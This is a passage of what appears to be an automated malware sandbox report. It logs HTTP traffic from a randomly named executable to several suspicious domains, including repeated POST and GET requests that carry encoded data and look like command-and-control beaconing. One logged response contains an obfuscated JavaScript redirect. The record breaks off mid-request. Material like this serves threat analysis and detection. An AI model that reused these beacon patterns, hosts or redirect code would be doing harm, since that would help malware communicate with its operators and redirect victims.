                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 239
                                                      Referer: http://www.d48dk.top/9ffw/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 6a 61 73 4d 70 4a 35 6c 52 4f 52 71 61 36 48 49 50 42 72 4c 71 48 72 32 6c 45 51 55 74 56 49 47 49 76 30 44 6f 38 56 4f 78 6d 62 6d 6d 57 68 35 47 4b 54 51 6e 75 36 74 6e 31 61 68 32 45 63 52 32 32 4f 68 76 63 4d 44 65 4e 68 6c 51 2f 33 75 32 62 76 57 39 67 6a 43 4c 4a 78 79 49 62 55 79 4b 56 50 70 5a 6f 51 2f 72 45 35 51 56 53 72 6e 76 45 33 50 6e 58 51 65 2b 69 33 74 7a 38 43 4d 70 39 6d 52 30 66 6a 70 39 79 2f 30 77 39 59 55 61 36 44 73 6d 48 47 6f 39 52 6a 69 4b 6f 7a 4d 73 62 75 62 31 50 52 70 35 35 35 69 45 36 6c 55 59 6d 55 5a 2b 46 2b 48 45 31 67 34 30 3d
                                                      Data Ascii: 66Sxjp=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/0w9YUa6DsmHGo9RjiKozMsbub1PRp555iE6lUYmUZ+F+HE1g40=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.749870154.23.184.20780564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:32.005245924 CET1816OUTPOST /9ffw/ HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.d48dk.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1251
                                                      Referer: http://www.d48dk.top/9ffw/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 37 61 73 2b 52 4a 36 45 52 4f 51 71 61 36 4e 6f 50 4d 72 4c 71 67 72 31 56 2b 51 55 70 76 49 45 41 76 31 6d 30 38 53 38 56 6d 52 6d 6d 57 35 4a 47 65 65 77 6e 37 36 74 33 78 61 68 6d 45 63 52 32 32 4f 6a 33 63 46 79 65 4e 6d 56 51 2b 30 75 32 50 38 47 38 48 6a 43 6a 7a 78 79 4e 67 58 44 71 56 50 4a 4a 6f 63 74 44 45 6d 41 56 51 71 6e 76 4d 33 50 6a 49 51 65 53 59 33 73 47 68 43 4d 42 39 6d 56 51 41 6b 4c 31 66 74 43 5a 69 55 30 36 6c 4a 36 79 76 4b 72 31 4b 6e 53 4c 4a 39 37 64 6d 67 71 49 41 46 4d 51 66 70 52 4d 74 69 48 6f 58 62 63 54 64 74 58 55 2b 35 2b 51 37 4a 41 65 33 71 78 32 74 56 4c 66 32 6c 33 45 50 35 63 62 75 6f 5a 39 67 36 68 59 59 67 65 4f 58 6c 70 61 59 6c 30 7a 57 65 63 6a 35 50 32 31 51 4c 65 45 6a 42 6f 71 69 57 71 74 6e 46 4b 64 78 63 42 36 65 74 6a 79 38 2b 6b 70 36 39 38 46 74 38 73 4b 43 6f 76 48 74 7a 43 57 6f 5a 33 49 36 49 6d 79 [TRUNCATED]
                                                      Data Ascii: 66Sxjp=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8Ih7as+RJ6EROQqa6NoPMrLqgr1V+QUpvIEAv1m08S8VmRmmW5JGeewn76t3xahmEcR22Oj3cFyeNmVQ+0u2P8G8HjCjzxyNgXDqVPJJoctDEmAVQqnvM3PjIQeSY3sGhCMB9mVQAkL1ftCZiU06lJ6yvKr1KnSLJ97dmgqIAFMQfpRMtiHoXbcTdtXU+5+Q7JAe3qx2tVLf2l3EP5cbuoZ9g6hYYgeOXlpaYl0zWecj5P21QLeEjBoqiWqtnFKdxcB6etjy8+kp698Ft8sKCovHtzCWoZ3I6ImyeDRfe5TFBxLXjcsr0Z1sRC8jUv83kJa4kkYaBEeiwJiX6bMAMQFezHlebwvjZ/9p1fMEmkisOMGP5JLAgEPAA62QGUC7oLx7XiJs1bhsuhYvRNAeu3VUp2Ctpu/w1mIi4QctgFpUeKzS+/Lt1fboqWh/rL94m5xcCtcuT7EaLAfl+PtZkbQuDJiBFrudLHEPCEvNXgB2lhhFg3ve75/U1UUVGvuC85n97Z96u92xn2pFM0QFK2gZcsMk256x8tM8fUEDK2qiINUI0A6+x8K631woVtGsZdUTMznAPO6xfPYlthGpH9OAwNX4zSgx2u5ryc68YUBdEQ+OGglDIx/lvkxlNrxPYb3RGwajj869XkLFuoBXR5gZlAS398QuXzR1ZumaV+7cPZVo3EYPcC3iykr20MOO8AaOB74xdF7nFM11vDZOZ4P3z3clHIlpUSpQSKhjEE1Z/sL4F3hyArQTc+kphlOuVKQ7PPzeK1kUHVxsJqnOFIlASJwdYpYmaie5GeEYevNvoxeUE5su1fwgfMfPVmcj8hkz2z8uQdq/4GTgnOg2PAKn5JtYIitgO487v/t7zvNm0glePEt9p8dh2Jvh/V58uzXhtZhkADZ/udt/rL8zpuDluzsNpW4HwXI6Uv3CblEGvMNXmohX10sXx8t6XowUVYDljW [TRUNCATED]
                                                      Dec 10, 2024 18:00:33.549079895 CET302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66927002-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.749876154.23.184.20780564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:34.669547081 CET532OUTGET /9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE HTTP/1.1
                                                      Host: www.d48dk.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:00:36.220484018 CET302INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 138
                                                      Connection: close
                                                      ETag: "66927002-8a"
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.74989638.165.29.23480564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:42.177238941 CET801OUTPOST /d3gs/ HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.8312zcksnu.bond
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 219
                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 67 53 65 74 6e 4c 61 67 4f 78 5a 70 2f 32 6b 66 6d 59 49 37 52 6f 6d 74 43 38 4f 32 63 72 45 78 50 67 72 58 58 71 47 32 72 74 37 6e 39 68 5a 6f 47 74 76 50 72 64 44 62 56 38 7a 35 41 4d 58 69 6f 36 50 64 34 61 49 66 45 34 46 4c 61 53 56 4f 70 33 6f 68 47 31 4f 47 77 47 41 57 6d 42 45 55 46 4a 32 57 75 6b 6f 57 6c 32 33 63 6f 76 6e 72 44 35 6c 65 52 39 71 4e 45 4e 38 64 48 37 2f 73 6f 68 5a 33 78 62 74 39 51 2b 39 6a 37 62 4c 75 37 49 42 6c 65 55 53 56 71 77 72 65 39 41 4b 33 53 78 43 6b 53 53 6a 53 2b 59 64 32 77 45 65 32 34 55 43 5a 65 35 4f 73 34 48 79 73 50 57 2b 74 63 69 4a 77 65 67 3d 3d
                                                      Data Ascii: 66Sxjp=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBleUSVqwre9AK3SxCkSSjS+Yd2wEe24UCZe5Os4HysPW+tciJweg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.74990238.165.29.23480564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:44.844358921 CET821OUTPOST /d3gs/ HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.8312zcksnu.bond
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 239
                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 67 78 4f 41 62 58 57 76 6d 32 73 74 37 6e 7a 42 5a 70 43 74 76 51 72 64 50 70 56 2b 6e 35 41 4d 72 69 6f 34 58 64 34 70 51 63 57 59 46 4a 53 79 56 51 6a 58 6f 68 47 31 4f 47 77 47 55 76 6d 48 73 55 46 36 75 57 30 47 4d 4a 2b 57 33 66 76 76 6e 72 48 35 6c 61 52 39 72 59 45 50 49 33 48 35 48 73 6f 6c 64 33 78 71 74 2b 66 2b 39 6c 6c 72 4c 39 38 35 6b 54 58 6b 4f 32 31 6d 6a 41 33 33 43 79 65 6e 44 47 49 77 76 2b 67 4a 6c 4e 30 47 36 41 76 79 66 73 63 34 4b 30 31 6c 47 4e 51 68 62 48 52 77 6f 30 49 66 56 4f 61 41 6f 6d 6b 67 51 65 79 42 6e 70 5a 64 69 6f 52 5a 38 3d
                                                      Data Ascii: 66Sxjp=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYgxOAbXWvm2st7nzBZpCtvQrdPpV+n5AMrio4Xd4pQcWYFJSyVQjXohG1OGwGUvmHsUF6uW0GMJ+W3fvvnrH5laR9rYEPI3H5Hsold3xqt+f+9llrL985kTXkO21mjA33CyenDGIwv+gJlN0G6Avyfsc4K01lGNQhbHRwo0IfVOaAomkgQeyBnpZdioRZ8=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.74990838.165.29.23480564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:47.517285109 CET1834OUTPOST /d3gs/ HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.8312zcksnu.bond
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1251
                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 6f 78 50 79 54 58 57 4a 75 32 74 74 37 6e 73 78 5a 6b 43 74 76 64 72 64 6e 74 56 2b 72 70 41 4a 76 69 70 62 66 64 76 4d 6b 63 64 59 46 4a 65 53 56 52 70 33 6f 34 47 31 65 43 77 47 45 76 6d 48 73 55 46 39 57 57 36 45 6f 4a 38 57 33 63 6f 76 6e 6e 44 35 6c 32 52 39 6a 49 45 50 4d 4e 48 6f 6e 73 72 46 4e 33 32 49 46 2b 53 2b 39 6e 6b 72 4b 67 38 35 59 41 58 6b 43 36 31 6d 2f 2b 33 77 47 79 62 57 61 4d 53 53 66 70 39 35 45 58 33 46 69 54 70 52 7a 47 46 4a 61 6a 32 32 65 57 53 54 44 47 4a 32 41 62 4c 36 4d 7a 4c 7a 30 46 6f 43 63 32 31 6b 36 68 62 73 33 73 41 59 76 71 6d 58 42 79 42 44 76 34 64 4d 61 5a 56 54 42 36 37 6a 6a 39 79 58 4f 55 4f 6e 31 45 77 37 67 64 6b 54 61 33 48 37 54 2f 6d 48 66 74 2b 6b 75 59 34 51 70 2f 34 69 59 31 69 4e 4c 69 47 42 46 65 6a 36 56 33 34 6e 48 2b 6c 62 67 6f 56 41 6d 4b 4e 6d 54 4d 46 39 68 69 6f 61 65 45 36 6c 79 6a 79 4a 4e [TRUNCATED]
                                                      Data Ascii: 66Sxjp=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYoxPyTXWJu2tt7nsxZkCtvdrdntV+rpAJvipbfdvMkcdYFJeSVRp3o4G1eCwGEvmHsUF9WW6EoJ8W3covnnD5l2R9jIEPMNHonsrFN32IF+S+9nkrKg85YAXkC61m/+3wGybWaMSSfp95EX3FiTpRzGFJaj22eWSTDGJ2AbL6MzLz0FoCc21k6hbs3sAYvqmXByBDv4dMaZVTB67jj9yXOUOn1Ew7gdkTa3H7T/mHft+kuY4Qp/4iY1iNLiGBFej6V34nH+lbgoVAmKNmTMF9hioaeE6lyjyJN6VWOdTWnlFOpEYWt+L/b9PeQKW45ib64oeSx9AhP+nNQkUf5rHAJz2iRK+raVsszc7xmAvpdTfRrwuEDKHPYJ+Gv1O/mxqIR+q6xqeFgU7oo7zUcIR73oGE4Y2wkAQEt22OgaW0g0qiMlyhsriPzQuY3tjX/8FMJKxshiNeyobbvHyP/zdNRfSsLF5uWNPdopyOuV2c2vZFXaWIKoX7BghSdQzZyfAHv4sO00OB6ttMF60q0o5zUq5pR6icQYwZNxWpMl06R1qy04AJBfl6Jz0b0MCYWPxhFR/bIlV40Kz7jhhldjygDTEPgUPd59vBnln5V5/b8E9cZ0uSBE4Yjt2qLbCai2oyXa2K5mvVSkkqHKA9OxnF/O3JpUMMCtDD7sXGx/w2KdWjd9Q9erBh3csMDKIOi/eRGBep7yUEaOxjGPIMPZcQ2pRbS7ig2JqO+lrHlD+Q3grFr2llkkn1AChKCMV64CLsyUWJlIQDxDmT4hJUXJqMS6iX8lMCvcVT5CGm7ptH+eEIt1ozbNplD1vnpcM5mNq3ThVx/GUWuASMwCOmqrux+7OkFtRWbuXhrgctO9pwyuMSKtbNGzO3EQzqtyBqQ1DIZjaL++W8MqMJdF79dhPHNrVwNKJD9TIZSmcXBEt1ZyRJTKPGamPM+SAQoS9NfXzmTu6 [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.74991338.165.29.23480564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:50.358683109 CET538OUTGET /d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE HTTP/1.1
                                                      Host: www.8312zcksnu.bond
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Dec 10, 2024 18:00:52.084012032 CET855INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 10 Dec 2024 17:00:51 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 32 39 36 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 37 34 61 39 61 63 65 62 37 63 61 63 32 35 64 61 66 61 37 61 30 62 31 35 63 64 38 62 35 63 39 64 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 31 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 [TRUNCATED]
                                                      Data Ascii: 296<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?74a9aceb7cac25dafa7a0b15cd8b5c9d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://test-demo.eekxp.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.74993213.248.169.4880564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:00:57.765922070 CET783OUTPOST /4nyz/ HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.snyp.shop
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 219
                                                      Referer: http://www.snyp.shop/4nyz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 4e 52 6f 68 66 4b 6a 7a 77 59 44 47 6d 6c 46 78 72 7a 43 30 62 73 69 4b 31 4c 35 4d 72 4e 63 51 6a 53 67 54 51 4a 58 44 41 6f 79 51 34 35 67 2b 48 52 55 65 4b 36 38 6e 4d 79 4b 4a 49 65 4e 57 48 48 31 71 63 53 6c 59 66 6e 38 62 6c 50 33 4e 45 70 51 52 37 44 55 65 62 78 48 43 57 4a 48 76 61 49 35 32 39 2f 67 6c 41 2b 32 34 78 48 5a 44 70 4b 33 71 55 53 39 79 56 63 46 58 37 7a 42 4b 6f 2b 76 6f 32 58 44 6a 36 39 69 41 69 63 2f 6d 47 73 53 51 67 56 31 58 50 48 74 6e 62 48 5a 49 69 31 71 33 78 39 68 55 6a 38 73 34 35 67 6f 64 39 43 5a 64 36 6f 62 50 69 6b 58 69 66 33 70 4c 47 4d 54 78 31 67 3d 3d
                                                      Data Ascii: 66Sxjp=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgV1XPHtnbHZIi1q3x9hUj8s45god9CZd6obPikXif3pLGMTx1g==
                                                      Dec 10, 2024 18:00:58.856128931 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.74993813.248.169.4880564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:01:00.422977924 CET803OUTPOST /4nyz/ HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Origin: http://www.snyp.shop
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Content-Length: 239
                                                      Referer: http://www.snyp.shop/4nyz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                      Data Raw: 36 36 53 78 6a 70 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 34 51 6a 77 6f 54 52 4e 4c 44 44 6f 79 51 77 5a 67 33 59 68 55 4a 4b 36 78 51 4d 7a 47 4a 49 59 68 57 48 43 52 71 63 6c 78 62 66 33 38 64 74 76 33 4c 41 70 51 52 37 44 55 65 62 78 69 58 57 4a 66 76 5a 34 4a 32 38 65 67 6d 62 65 32 37 32 48 5a 44 6a 71 33 32 55 53 39 41 56 5a 35 78 37 78 4a 4b 6f 2b 66 6f 32 46 72 38 30 39 69 4f 2f 4d 2b 66 4a 4d 58 67 6e 30 4a 76 4f 6b 52 79 53 56 52 69 6a 44 72 56 72 66 74 34 39 74 55 44 39 69 4d 72 71 6b 45 6f 34 70 66 58 76 47 6a 44 41 41 4d 68 4c 65 79 31 6a 63 44 68 4c 36 42 48 42 30 4f 31 2f 77 5a 4b 50 4c 79 4a 34 61 77 3d
                                                      Data Ascii: 66Sxjp=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/4QjwoTRNLDDoyQwZg3YhUJK6xQMzGJIYhWHCRqclxbf38dtv3LApQR7DUebxiXWJfvZ4J28egmbe272HZDjq32US9AVZ5x7xJKo+fo2Fr809iO/M+fJMXgn0JvOkRySVRijDrVrft49tUD9iMrqkEo4pfXvGjDAAMhLey1jcDhL6BHB0O1/wZKPLyJ4aw=
                                                      Dec 10, 2024 18:01:01.615715027 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.74994413.248.169.4880564C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 10, 2024 18:01:03.276416063 CET1816OUTPOST /4nyz/ HTTP/1.1
                                                      Host: www.snyp.shop
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
